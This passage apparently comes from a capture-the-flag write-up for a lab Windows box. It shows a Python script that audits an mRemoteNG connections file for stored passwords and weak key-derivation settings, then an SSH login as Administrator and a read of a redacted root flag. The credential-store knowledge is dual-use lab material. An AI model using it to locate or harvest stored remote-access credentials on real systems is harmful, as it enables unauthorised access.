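    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
        Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain=""
        Password="PLACEHOLDER_CIPHERTEXT" Hostname="127.0.0.1" Protocol="RDP" />
    <Node Name="Lab" Type="Container" Descr="" Icon="mRemoteNG" Panel="General" Id="CONSTRUCTED-ID-1">
        <Node Name="jump" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
            Id="CONSTRUCTED-ID-2" Username="ops" Domain="" Password="" Hostname="10.0.0.5" Protocol="SSH2" />
    </Node>
</mrng:Connections>
"""

MIN_KDF_ITERATIONS = 10000   # assumption for this example, not an mRemoteNG default


def _walk(node, prefix, out):
    """Collect every connection node that stores a password, with its folder path."""
    for child in node.findall("Node"):
        path = prefix + child.get("Name", "?")
        if child.get("Type") == "Container":
            _walk(child, path + "/", out)
        elif child.get("Password"):
            out.append({"path": path, "user": child.get("Username", ""),
                        "host": child.get("Hostname", ""), "protocol": child.get("Protocol", "")})


def audit_confcons(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    if not root.tag.endswith("Connections"):
        raise ValueError("not an mRemoteNG connections file: root is %r" % root.tag)
    kdf = int(root.get("KdfIterations", "0"))
    full_file = root.get("FullFileEncryption", "false").lower() == "true"
    creds = []
    _walk(root, "", creds)
    findings = []
    if not full_file:
        findings.append("FullFileEncryption=false: hostnames, usernames and protocols are stored in clear")
    if kdf < MIN_KDF_ITERATIONS:
        findings.append("KdfIterations=%d is below the %d threshold assumed here" % (kdf, MIN_KDF_ITERATIONS))
    if creds:
        findings.append("%d connection(s) carry a stored password; confirm a custom master password is set"
                        % len(creds))
    return {
        "engine": root.get("EncryptionEngine", ""),
        "mode": root.get("BlockCipherMode", ""),
        "kdf_iterations": kdf,
        "full_file_encryption": full_file,
        "stored_credentials": creds,
        "findings": findings,
    }


if __name__ == "__main__":
    result = audit_confcons(SAMPLE_CONFCONS)
    for cred in result["stored_credentials"]:
        print("stored credential:", cred)
    for finding in result["findings"]:
        print("finding:", finding)
```

Pointed at a real confCons.xml under a user's AppData\Roaming\mRemoteNG, this gives an inventory of which remote systems and accounts would be exposed if the file leaked, which is the question to ask during an incident like the one this box models.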

Finally, we can connect as Administrator.

$ssh administrator@10.10.10.134

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>

administrator@BASTION C:\Users\Administrator>whoami

bastion\administrator

administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt

9588XXXXXXXXXXXXXXXXXXXXXXXXXXXX
